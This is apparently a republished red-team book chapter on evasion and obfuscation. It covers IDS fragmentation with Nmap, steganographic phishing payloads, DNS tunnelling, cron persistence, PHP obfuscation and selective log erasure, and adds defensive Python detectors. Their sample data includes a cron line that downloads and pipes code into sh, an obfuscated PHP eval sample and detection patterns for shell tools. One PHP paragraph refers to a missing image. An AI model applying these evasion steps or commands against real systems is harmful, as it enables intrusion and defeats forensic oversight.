Evasion & Obfuscation Techniques
*Note: This article was originally published by the author on November 7, 2018, as part of the Peerlyst Red Team Book collaboration.
“Subtle and insubstantial, the expert leaves no trace; divinely mysterious, he is inaudible. Thus he is the master of his enemy’s fate.” ~Sun Tzu, The Art of War
Congratulations are in order: “You’re in.” All of the tedious reconnaissance and enumeration prep work paid off, and access to the network or system was achieved. Success was really only ever a matter of time and persistence on the attacker’s part anyway. After all, the defender has the nearly impossible task of being right every time, whereas the attacker only has to get lucky once.
Popping a shell was just the beginning, though; now comes the difficult part. How do hackers remain undetected on a system in order to carry out further exploitation? It is much more difficult than it may seem. Maintaining stealth is of utmost importance, with the primary goal of avoiding discovery by remaining as quiet as possible on the system. Evasion and obfuscation are about treading silently and invisibly to the greatest extent possible, to avoid suspicion and detection.
Evasion is bypassing an information security device (e.g., firewall or intrusion detection/prevention systems) in order to deliver an exploit, attack, or other form of malware to a target network or system, without detection.
There are numerous methods and tools that attackers can use to evade network and system-level detection. The concepts discussed in this chapter are not meant to be an exhaustive compilation, but rather potential starting points to consider during Red Team ops. It is always best to assume the worst and hope for the best so that the team is prepared for any eventuality.
That said, it is best to assume the compromised system environment is hostile: write-once-read-many (WORM) event logging that is remotely backed up, an IDS or IPS, anti-virus/anti-malware scanning, and skilled network security administrators actively monitoring and hunting for threats on the network, even though the target system may not actually have any of those things.
Thinking this way forces an attacker to expend all means necessary to remain undetected and avoid sloppy mistakes that are easily traceable. Let’s look at some methods attackers may use to exploit systems and remain relatively quiet and undetectable to the naked eye.
Bypassing Intrusion Detection/Prevention Systems (IDS/IPS)
First, imagine a scenario in which no backdoor exists and the attacker is attempting to gain system access in stealth mode. The attacker will need to contend with the firewall and possibly also an IDS or IPS. Like most security products, IDS solutions are not without vulnerabilities. A network IDS or NIDS performs in-depth packet analysis looking for patterns and anomalies against known malware signature databases.
One method of evading IDS/IPS detection is session splicing, also known as fragmenting TCP packets: custom-crafting the packets sent through the firewall and IDS into fragments that are unlikely to be flagged, but that can be reassembled after successfully passing through. Doing this forces the NIDS to spend more resources attempting to reconstruct the fragments, a task it will not always be able to perform successfully.
An attacker might attempt a series of quiet (i.e., low signal-to-noise ratio) attacks that involve fragmenting packets only, or fragment packets with overwriting. Another option is to initiate an attack, follow it with many false attacks, and then finish the initial attack, confusing the IDS by breaking up the packet strings. A bit of subterfuge…
There are several freely available packet crafting tools that work with the Linux, Mac OSX, and Windows operating systems such as Scapy, Hping, SoCat, Nmap, and Wireshark. As a pentester and Red Team member, find tools that suit your needs and learn what special features each comes equipped with. It is up to you to build your own toolkit.
Every hacker has their own preferences as well as certain Tactics, Techniques, and Procedures (TTP) that can be used to identify them. Additionally, not all hacking tools are created equal; some are noisier than others in terms of detection. Why use a sledgehammer when you can use a precision scalpel? An attacker has several options once they gain system access.
They may attempt some type of privilege escalation perhaps using a User Account Control (UAC) bypass technique and then ‘burn it all down’ or wipe everything (i.e., the sledgehammer approach). The stealthier option, however, would be for the attacker to plant a Trojan backdoor to quietly access the system as desired. Perhaps the target system will yield further valuable Intel or data at a later time, and it could prove valuable as a lateral attack platform to obfuscate the evidence trail.
Nmap is another essential scanning tool that allows an attacker to perform fragmented scans using the -f (fragment packets) option, or the --mtu (maximum transmission unit) option to set a custom fragment size; the Ethernet MTU typically defaults to 1,500 octets (8-bit bytes). Fragmenting packets to less than the default MTU (the value must be a multiple of 8) likely stands a better chance of passing without detection, depending on how the firewall is configured.
Another option is the --send-eth option, which bypasses the Internet Protocol (IP) layer and sends raw Ethernet frames instead. What Nmap and other packet crafting tools can do is limited by what the user is attempting to perform. A full Nmap OS or Xmas scan, for example, does not support fragmentation and would be far too ‘noisy’ in terms of remaining undetected on the system.
TCP un-sync is another method attackers can use to bypass the IDS/IPS by injecting packets that contain a bad TCP checksum.
An attacker can also inject a fake ‘FIN’ packet or an out-of-sequence packet number that can cause an IDS to ‘hiccup’ and allow a malformed packet through to the host target (e.g., Web or file database servers).
Low Time-To-Live (TTL) packet values refer to the amount of time the packet is allowed to remain active before it disappears forever. An option to bypass detection is to combine packet fragmentation with a low TTL value. This method attempts to trick the IDS/IPS into allowing a packet destined for a host that is behind the IDS. There will be some amount of trial and error before an attacker knows whether these techniques are successful.
Malware Cloaking Using Digital Steganography
While most Red Teams would never consider using digital steganography to gain access to a target system or even know where to begin, it can be a powerful technique that can be combined with other types of attacks. Digital steganography is the ultimate in stealth because it is invisible to the naked eye. Without special scanning software tools, network administrators would be hard-pressed to notice steg activity. Malware may also be customized to incorporate digital steganography to disguise the packets to appear like normal network traffic.
Digital steganography has increasingly been used by cyber threat actors to hide cyber-espionage malware or any type of malware such as Microcin (a.k.a., six little monkeys); NetTraveler; Zberp; Enfal (its new loader is called Zero.T); Shamoon; KinS; ZeusVM; Triton (Fibbit); and most recently it was used by the Narwhal Spider Advanced Persistent Threat (APT) group in combination with MS Excel spreadsheet Visual Basic scripted macros. Embedding the hidden malware within other carrier file types using digital steganography applications has the added benefit of not raising suspicion as it will appear as a normal image, audio, or video file download. Once a hidden file is embedded within the carrier file, it is then known as a stego-file and its hidden file contents can also be encrypted.
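Whether a carrier image deserves a closer look can often be decided from its container structure alone, before any pixel-level analysis. As an added example (not code from the original article), the following Python builds a constructed minimal PNG, then walks the chunk list the way a mail gateway or file scanner might: it verifies each chunk CRC, reports chunk types the PNG specification does not define, and reports any bytes appended after IEND together with their Shannon entropy, since an appended payload that is encrypted or compressed tends to sit near 8 bits per byte. Note the limitation: this catches appended or extra-chunk payloads, not LSB embedding inside the pixel data, which needs statistical tests on the image itself.

```python
import math
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Chunk types defined by the PNG specification; anything else is worth a look
STANDARD_CHUNKS = {b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tRNS", b"gAMA", b"cHRM", b"sRGB", b"iCCP",
                   b"tEXt", b"zTXt", b"iTXt", b"bKGD", b"pHYs", b"sBIT", b"sPLT", b"hIST", b"tIME"}


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Length + type + data + CRC32 over type and data, as the PNG format requires."""
    return struct.pack("!I", len(data)) + ctype + data + struct.pack("!I", zlib.crc32(ctype + data) & 0xFFFFFFFF)


def make_png(width: int = 2, height: int = 2) -> bytes:
    """Constructed minimal 8-bit RGB PNG (sample input, not a real file)."""
    raw = b"".join(b"\x00" + b"\x00\x00\x00" * width for _ in range(height))  # filter byte + RGB pixels per row
    ihdr = struct.pack("!IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return PNG_SIG + png_chunk(b"IHDR", ihdr) + png_chunk(b"IDAT", zlib.compress(raw)) + png_chunk(b"IEND", b"")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; values near 8.0 suggest encrypted or compressed content."""
    if not data:
        return 0.0
    counts = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def inspect_png(blob: bytes) -> list:
    """Walk the chunk list and report structural oddities a carrier file may show."""
    findings = []
    if not blob.startswith(PNG_SIG):
        return [("not_png",)]
    pos = len(PNG_SIG)
    while pos + 8 <= len(blob):
        length, ctype = struct.unpack("!I4s", blob[pos:pos + 8])
        end = pos + 12 + length
        if end > len(blob):
            findings.append(("truncated_chunk", ctype.decode("latin-1")))
            return findings
        data = blob[pos + 8:pos + 8 + length]
        crc = struct.unpack("!I", blob[pos + 8 + length:end])[0]
        if zlib.crc32(ctype + data) & 0xFFFFFFFF != crc:
            findings.append(("crc_mismatch", ctype.decode("latin-1")))
        if ctype not in STANDARD_CHUNKS:
            findings.append(("nonstandard_chunk", ctype.decode("latin-1"), length))
        pos = end
        if ctype == b"IEND":
            break  # decoders stop here, so anything that follows is invisible to the viewer
    trailing = blob[pos:]
    if trailing:
        findings.append(("trailing_data", len(trailing), shannon_entropy(trailing)))
    return findings


if __name__ == "__main__":
    clean = make_png()
    print("clean image:", inspect_png(clean))
    print("with appended bytes:", inspect_png(clean + bytes(range(256))))
```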
How is this useful in terms of Red Team activities? Depending on the Red Team’s agreed-upon Rules of Engagement (ROE) with the customer, they might consider sending a stego-file containing malware such as a backdoor Trojan (e.g., macro-enabled MS Word or Excel are a couple of options). This is a technique that could be combined with Red Team social engineering attacks as an attachment on a spearphishing or whaling email.
Considering that most corporate executives are statistically male, the highest probability of success with blind spearphishing or whaling emails is to attach a stego-image file of an attractive female that relates to whatever subject the phishing email concerns. Once a victim double-clicks the image, the infection occurs invisibly.
Fictitious Scenario: After identifying herself as a software sales associate from [insert real company name here], Donna explains to the target victim, Robert, that she’ll need to email him some product documentation and images so that he can view the product details and determine if his company is interested in purchasing the software that Donna so nicely described over the phone earlier. When the target victim, Robert, receives the bait email that he is anticipating from his previous conversation with Donna, he opens the email and begins viewing the software product documentation, and attached photos of what the Graphical User Interface (GUI) looks like for specific user modules. When Robert clicks to open one of the image files, the action opens the image but also silently triggers the malware dropper hidden within the image file to download the malware payload backdoor Trojan in the background processes. Now Robert’s computer has been infected with malware which could result in the attacker gaining root-level access.
Incorporating digital steganography as an advanced malware detection evasion technique requires an advanced level of skill. Accordingly, malware that incorporates steganography to mask its presence is typically custom-written by skilled malware developers. There are malware development tools available on the Dark Web for a price, but it is highly advised that Red Team pentesters not use such software as it is often malware itself and is illegal to possess.
*NOTE: If found to be in possession of malware or to have used it, a person can be arrested and charged under the Computer Fraud and Abuse Act (CFAA) as well as other laws. The type of malware suggested here is for Red Team exercises only and should only contain benign exploit payloads that do not inflict any actual system damage, in accordance with the rules of engagement that the customer and Red Team have agreed upon.
Covert Channel Data Exfiltration Using DNS Tunneling
In a protected system environment complete with firewalls, anti-virus/malware software, IDS/IPS, external communication between the malware or spyware and a Command and Control (C&C) server is relegated to communicating over covert channels or else it risks immediate detection. Domain Name Service (DNS) plays a vitally important role on the Internet by translating IP addresses to website domain names and vice versa, among other functions.
The DNS protocol operates using User Datagram Protocol (UDP) and limits outbound queries to 255 bytes of alphanumeric characters and hyphens. The fact that DNS operates using UDP and has such small size constraints on external queries is exactly why DNS is an ideal choice for smuggling data into and out of a network. No one would suspect it, and DNSSEC may not be enabled or fully defend against DNS tunneling.
Due to the fact that data can be secretly embedded into the DNS protocol packets, DNS tunneling can be considered a lesser-known form of digital steganography.
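The properties that make DNS attractive for smuggling data are the same ones that make a tunnel stand out in resolver logs: a stream of long, high-entropy, never-repeated subdomains under one registered domain, usually via TXT, NULL or CNAME lookups. As an added example (not code from the original article), the following Python runs that kind of per-domain statistical check over a constructed query log. The log format (timestamp, client, query type, name), the thresholds, and the "last two labels" approximation of a registered domain are all assumptions; a production version would use the public suffix list and baseline the thresholds against the organisation's own traffic.

```python
import math
from collections import defaultdict

# Constructed query log (timestamp client qtype qname); not from any real resolver.
SAMPLE_LOG = """\
2018-11-07T10:00:01Z 10.0.0.5 A www.example.com
2018-11-07T10:00:02Z 10.0.0.5 A mail.example.com
2018-11-07T10:00:03Z 10.0.0.5 AAAA www.example.com
2018-11-07T10:00:04Z 10.0.0.5 A cdn1.example.org
2018-11-07T10:00:05Z 10.0.0.5 A cdn2.example.org
2018-11-07T10:00:06Z 10.0.0.5 A cdn1.example.org
2018-11-07T10:00:07Z 10.0.0.5 A cdn3.example.org
2018-11-07T10:00:08Z 10.0.0.5 A cdn2.example.org
2018-11-07T10:00:09Z 10.0.0.7 TXT nfzvn5lqaaaaaaaabcdyqkjp2mnyz4pfjyi.t.tunnel-example.net
2018-11-07T10:00:10Z 10.0.0.7 TXT ge2tsnbrgu3denbugi4tsoa4tuvjb3xxkl.t.tunnel-example.net
2018-11-07T10:00:11Z 10.0.0.7 TXT mzxw6ytboi4tq3tfnvbtmx3dojsgc5dfom.t.tunnel-example.net
2018-11-07T10:00:12Z 10.0.0.7 TXT gezdgnbvgy3tqojqgfptsnrumfrgk4tx7g.t.tunnel-example.net
2018-11-07T10:00:13Z 10.0.0.7 TXT nbswy3dpeb3w64tmmqqhi4tbnzzgmzlsfq.t.tunnel-example.net
"""


def registered_domain(qname: str) -> str:
    """Simplification: the last two labels. A real deployment would consult the public suffix list."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def entropy(s: str) -> float:
    """Shannon entropy in bits per character of the subdomain part of a name."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def analyze_dns_log(log_text: str, min_queries: int = 5) -> dict:
    """Group queries by registered domain and report domains showing at least two tunnelling traits."""
    by_domain = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, client, qtype, qname = line.split()
        by_domain[registered_domain(qname)].append((client, qtype.upper(), qname.lower().rstrip(".")))
    report = {}
    for domain, entries in by_domain.items():
        if len(entries) < min_queries:  # too few samples to judge
            continue
        names = [q for _, _, q in entries]
        subs = [q[:-len(domain) - 1].replace(".", "") for q in names]  # everything left of the registered domain
        unique_ratio = len(set(names)) / len(names)
        avg_len = sum(len(q) for q in names) / len(names)
        avg_entropy = sum(entropy(s) for s in subs) / len(subs)
        rare_types = sum(1 for _, t, _ in entries if t in ("TXT", "NULL", "CNAME")) / len(entries)
        reasons = []
        if unique_ratio > 0.9:
            reasons.append("nearly every query is a unique name")
        if avg_len > 50:
            reasons.append("unusually long query names")
        if avg_entropy > 3.5:
            reasons.append("high-entropy subdomain labels")
        if rare_types > 0.5:
            reasons.append("mostly TXT/NULL/CNAME lookups")
        if len(reasons) >= 2:
            report[domain] = {"queries": len(entries), "clients": sorted({c for c, _, _ in entries}),
                              "avg_len": round(avg_len, 1), "avg_entropy": round(avg_entropy, 2),
                              "reasons": reasons}
    return report


if __name__ == "__main__":
    for domain, info in analyze_dns_log(SAMPLE_LOG).items():
        print(domain, info)
```

Volume is the other dimension worth keeping: a single client producing hundreds of unique names under one domain per hour is the usual tunnel signature even when individual names are kept short to stay under the radar.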
Linux Crontab Command
Kronos was the Greek god of time, and of course, Linux has named its command function for scheduling timed automated actions as “crontab”. Attackers can use ‘crontab’ commands to remotely schedule covert actions to occur on a breached system at periodic intervals. For instance, an attacker may want to have a listing of new file names that were added to the system sent back to the C&C server on a weekly basis using hidden DNS tunneling.
To see if there are any crontab events that currently exist, look in the following directory: /var/spool/cron/crontabs
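Looking in that directory is the manual version of a check that is easy to automate for a fleet of hosts. The following Python is an added example (not code from the original article) that parses crontab entries in the per-user format found under /var/spool/cron/crontabs and scores each job against a small set of assumed heuristics: network fetches, run-time base64 decoding, output piped into a shell, DNS or network clients invoked from a job, and binaries run from temp or hidden directories. The system crontab (/etc/crontab and /etc/cron.d) carries an extra user column, which this parser does not handle; the weights and the sample crontab are constructed for illustration.

```python
import re

# Assumed heuristics with rough weights; a real deployment would tune these to the environment.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b"), 2, "fetches content from the network"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), 2, "decodes base64 at run time"),
    (re.compile(r"\|\s*(ba|z|da)?sh\b"), 2, "pipes output into a shell"),
    (re.compile(r"\b(nc|ncat|nslookup|dig)\b"), 2, "network or DNS client run from a job"),
    (re.compile(r"(/tmp/|/dev/shm/|/\.[A-Za-z0-9_-]+/)"), 1, "runs from a temp or hidden directory"),
    (re.compile(r">\s*/dev/null\s+2>&1"), 0, "discards all output (common, informational only)"),
]
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def parse_crontab(text: str):
    """Yield (schedule, command) pairs from a per-user crontab (no user column)."""
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#") or ENV_LINE.match(s):
            continue  # comments and environment assignments such as SHELL=/bin/sh
        if s.startswith("@"):  # @reboot, @daily, @weekly and friends
            schedule, _, command = s.partition(" ")
        else:
            parts = s.split(None, 5)
            if len(parts) < 6:
                continue  # malformed entry: fewer than five schedule fields plus a command
            schedule, command = " ".join(parts[:5]), parts[5]
        yield schedule, command.strip()


def audit_crontab_text(text: str, owner: str = "unknown") -> list:
    """Return every job whose weighted heuristic score is above zero, with the reasons."""
    findings = []
    for schedule, command in parse_crontab(text):
        reasons, score = [], 0
        for pattern, weight, why in SUSPICIOUS:
            if pattern.search(command):
                reasons.append(why)
                score += weight
        if score > 0:
            findings.append({"owner": owner, "schedule": schedule, "command": command,
                             "score": score, "reasons": reasons})
    return findings


def audit_crontab_files(paths) -> list:
    """Run the audit over real files, e.g. everything under /var/spool/cron/crontabs."""
    out = []
    for path in paths:
        try:
            with open(path) as fh:
                out.extend(audit_crontab_text(fh.read(), owner=path))
        except OSError:
            pass  # unreadable or vanished file; a real tool would log this
    return out


# Constructed sample crontab: one ordinary backup job and two entries worth a look.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
SHELL=/bin/sh
0 2 * * * /usr/local/bin/backup.sh
*/10 * * * * curl -s http://203.0.113.10/u | base64 -d | sh
@weekly /var/tmp/.cache/sync.sh > /dev/null 2>&1
"""

if __name__ == "__main__":
    for finding in audit_crontab_text(SAMPLE_CRONTAB, owner="www-data"):
        print(finding["score"], finding["schedule"], finding["command"], finding["reasons"])
```

The hidden-directory heuristic is deliberately low-weight on its own: plenty of legitimate tooling lives under dot-directories, and the value of the audit comes from reviewing the scored list against what the host is supposed to be doing, not from the numbers alone.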
Notice in the example image (above) that line 1 turns off error reporting by setting the value inside the parentheses to 0. Line 3 is where the character reordering occurs, with the out-of-order string “ps_ot”; line 4 then reorders those letters to spell “_POST.” Lines 5–12 verify that the HTTP request was made using the POST method and use the “eval” command to run the “lequ” malware code, without the attacker ever typing “POST” and triggering an event alarm. Character reordering also works with the $_POST, $_REQUEST, $_FILES, and $_COOKIE superglobal arrays.
Other PHP evasion techniques involve string manipulation functions such as:
- str_replace: replaces all occurrences of the first argument (search) with the second argument (replacement) inside the third argument (subject string)
- str_rot13: shifts every letter by 13 places in the English alphabet
- ‘.’ operator: concatenates characters or strings
- strrev: reverses a string
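Because these transformations leave recognisable residue in the source (the decode function itself, the reversed superglobal name, a variable whose name is computed at run time), a webshell hunt can score PHP files on exactly those traces. The following Python is an added example, not code from the original article: a small regex-based scorer with assumed weights, run over two constructed PHP samples, one ordinary form handler and one that uses the tricks described above (error reporting off, strrev to build “_POST”, a variable variable, str_rot13 and eval on decoded data). str_replace is left out of the signatures on purpose because it is far too common in clean code to carry weight on its own.

```python
import re

# (pattern, weight, description): assumed heuristics, not a vendor signature set
SIGNATURES = [
    (r"\beval\s*\(", 3, "eval of runtime data"),
    (r"\b(base64_decode|gzinflate|gzuncompress|str_rot13|strrev|hex2bin)\s*\(", 2,
     "decode or string-transform function"),
    (r"\$\{\s*\$|\$\$[A-Za-z_]", 2, "variable variable (name computed at run time)"),
    (r"\$GLOBALS\s*\[", 1, "superglobal reached through $GLOBALS"),
    (r"error_reporting\s*\(\s*0\s*\)", 1, "error reporting disabled"),
    (r"[\"'][^\"']*(TSOP_|TEG_|TSEUQER_|SELIF_|EIKOOC_)[^\"']*[\"']", 3,
     "reversed superglobal name in a string"),
    (r"\b(exec|shell_exec|system|passthru|popen|proc_open)\s*\(", 2, "command execution function"),
    (r"preg_replace\s*\(\s*[\"'][^\"']*/[a-zA-Z]*e[a-zA-Z]*[\"']", 3, "preg_replace with the /e modifier"),
]
COMPILED = [(re.compile(p), w, d) for p, w, d in SIGNATURES]


def scan_php(source: str) -> dict:
    """Score a PHP source string; hits are (line number, description) pairs."""
    hits, score = [], 0
    for lineno, line in enumerate(source.splitlines(), 1):
        for pattern, weight, desc in COMPILED:
            for _ in pattern.finditer(line):
                hits.append((lineno, desc))
                score += weight
    return {"score": score, "hits": hits}


def classify(source: str, threshold: int = 6) -> str:
    """Assumed cut-off: a single eval plus one decoder is enough to warrant a manual look."""
    return "suspicious" if scan_php(source)["score"] >= threshold else "clean"


# Constructed sample: an ordinary form handler.
BENIGN = """<?php
$name = $_POST["name"] ?? "";
echo "Hello, " . htmlspecialchars($name, ENT_QUOTES, "UTF-8");
"""

# Constructed sample using the reordering tricks described in the text; the eval argument is a placeholder.
OBFUSCATED = """<?php
error_reporting(0);
$name = strrev("TSOP_");
$in = ${$name}["q"];
echo str_rot13($in);
eval(base64_decode("PLACEHOLDER_BASE64"));
"""

if __name__ == "__main__":
    for label, src in (("benign", BENIGN), ("obfuscated", OBFUSCATED)):
        result = scan_php(src)
        print(label, classify(src), result["score"], result["hits"])
```

Scoring by line keeps the output reviewable: the analyst sees which line tripped which signature rather than a bare verdict, which matters because individual functions like strrev or base64_decode are legitimate on their own and only become interesting in combination.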
Obfuscating Indicators of Compromise (IoC)
Obfuscation can mean different things to different people depending on the context it is used in. Evasion and obfuscation are interrelated within the hacking universe. Obfuscation is generally defined as making something difficult to understand or trace back to its origin once evasion has either failed or is no longer an option. As one might imagine, there are several methods of performing obfuscation that are limited only by imagination and technological constraints.
Obfuscation is partly why accurate cyber-attack attribution to a specific threat actor or APT group is often said to be a guessing game. For example, there is a high probability that a skilled attacker will know how to cover their tracks and also knows that penetrating a system located in another country or region and then pivoting laterally and attacking another system based in an entirely different country or region has the advantage of making it appear as though the attack originated from somewhere it didn’t. This is a form of obfuscation and it is why intelligence agencies and cybersecurity firms cannot be too quick to point the finger at which nation is responsible though it may appear to be so obvious.
If Israel, for example, wanted to make it appear as though Iranian hackers broke into Saudi Arabia’s critical infrastructure systems and shut down all of their electrical power to spark a war or retaliation, they could hack into Iranian systems and launch the attacks from the compromised Iranian computer systems. Saudi Arabia might then arrive at the conclusion that Iran was responsible, kicking off kinetic military hostilities as retribution. When nation-state cyber threat actors are involved in these types of cyber warfare or cyber espionage activities, anti-forensic techniques such as erasing system event logs to frustrate forensic investigation should be considered, and the logs should be checked to determine whether any are missing.
Though it is tempting, forget about disabling system Event logging or purging the logs after successfully accessing a system. This is a rookie n00b move and could be a costly mistake. Disabling or deleting Event logs would be a clear indication to any network security administrator that is paying attention that the system has been compromised. Not to mention, it is an action sure to trip the alarm if a system has an IDS/IPS deployed on the network or if Windows Event Forwarding (WEF) is configured to alert the system administrator of such activity. It is important for Red Team pentesters to fully understand how Event logging functions within the various types of operating systems and database types. Windows is not equal to Linux which is not equal to Mac OSX and so forth.
An attacker may limit their espionage activities on a specific system to a specific time window of say 4-to-8 hours and then erase only the event log(s) for the time period they were inside the system. This might be hard to notice for a security administrator that is responsible for hundreds if not thousands of systems. This is also why Security Information and Event Manager (SIEM, pronounced “sim” with a silent ‘e’) is vital to network security monitoring for large organizations. Modifying or deleting event logs may not be possible, however, if the event logs are configured to automatically be stored externally at another location either within the network or an entirely different Cloud-Service Provider (C-SP) storage/backup solution.
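Erasing only a time window of events leaves two things a SIEM can see: a hole in the otherwise consecutive EventRecordID sequence, and a quiet period that does not match the host's normal event rate, while a full clear writes its own record (Security event ID 1102, or 104 for the System and Application logs) at the start of the fresh log. As an added example (not code from the original article), the following Python runs those checks over constructed records shaped like a parsed Windows event log export and, for the case the text raises of logs stored externally, diffs the host's copy against the forwarded copy to list the records the host no longer has. The one-hour quiet threshold and the record layout are assumptions for the example.

```python
from datetime import datetime, timedelta

# Windows event IDs that record a log being cleared (Security: 1102; System/Application: 104)
CLEAR_EVENT_IDS = {1102: "Security log cleared", 104: "System or Application log cleared"}


def rec(record_id: int, when: str, event_id: int) -> dict:
    """Constructed event record in the shape of a parsed EVTX export (sample data, not real logs)."""
    return {"EventRecordID": record_id, "TimeCreated": datetime.fromisoformat(when), "EventID": event_id}


def audit_event_log(records, max_quiet=timedelta(hours=1)) -> list:
    """Flag clear events, non-consecutive record IDs, clock reversals and over-long quiet periods."""
    findings = []
    prev = None
    for cur in sorted(records, key=lambda r: r["EventRecordID"]):
        if cur["EventID"] in CLEAR_EVENT_IDS:
            findings.append(("log_cleared", cur["EventRecordID"], cur["EventID"]))
        if prev is not None:
            if cur["EventRecordID"] != prev["EventRecordID"] + 1:
                # EVTX record IDs are issued sequentially; a hole means records are gone
                findings.append(("record_gap", prev["EventRecordID"], cur["EventRecordID"]))
            delta = cur["TimeCreated"] - prev["TimeCreated"]
            if delta < timedelta(0):
                findings.append(("out_of_order", prev["EventRecordID"], cur["EventRecordID"]))
            elif delta > max_quiet:
                findings.append(("time_gap", prev["EventRecordID"], cur["EventRecordID"], delta.total_seconds()))
        prev = cur
    return findings


def missing_locally(local, forwarded) -> list:
    """Record IDs present in the forwarded (WEF/SIEM) copy but absent from the host's own log."""
    have = {r["EventRecordID"] for r in local}
    return sorted(r["EventRecordID"] for r in forwarded if r["EventRecordID"] not in have)


# Forwarded copy held by the SIEM: twelve logon events (4624), one every ten minutes from 09:00
FORWARDED = [rec(1000 + i, "2018-11-07T%02d:%02d:00" % (9 + i // 6, (i % 6) * 10), 4624) for i in range(12)]
# Scenario A: records 1004..1009 were removed from the host's copy
LOCAL_SELECTIVE = [r for r in FORWARDED if not 1004 <= r["EventRecordID"] <= 1009]
# Scenario B: the host's log was cleared; the fresh log starts over with the clear event itself
LOCAL_CLEARED = [rec(1, "2018-11-07T10:55:00", 1102)]

if __name__ == "__main__":
    print("selective:", audit_event_log(LOCAL_SELECTIVE), missing_locally(LOCAL_SELECTIVE, FORWARDED))
    print("cleared:", audit_event_log(LOCAL_CLEARED), missing_locally(LOCAL_CLEARED, FORWARDED))
```

The forwarded-copy comparison is the check that holds up regardless of what was done on the host, which is why the text's point about externally stored logs matters more than any single gap heuristic.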
When conducting Red Team ops, it is generally best to behave like a normal user to avoid detection. Think of the user environment and what type of business activities users might typically be involved in. Creating a general user account on the system is one method of lying low under the radar and accessing files to see what the system has. When performing actions that require escalated privileges, perform actions at the lowest level possible and then log in as root to selectively erase the event log items (if possible). Keep actions to a minimum when in the “God-mode” root level to minimize ‘noise’ within the system that will attract attention. In order to obfuscate the metadata associated with event logs, a tool such as TimeStomp can be utilized.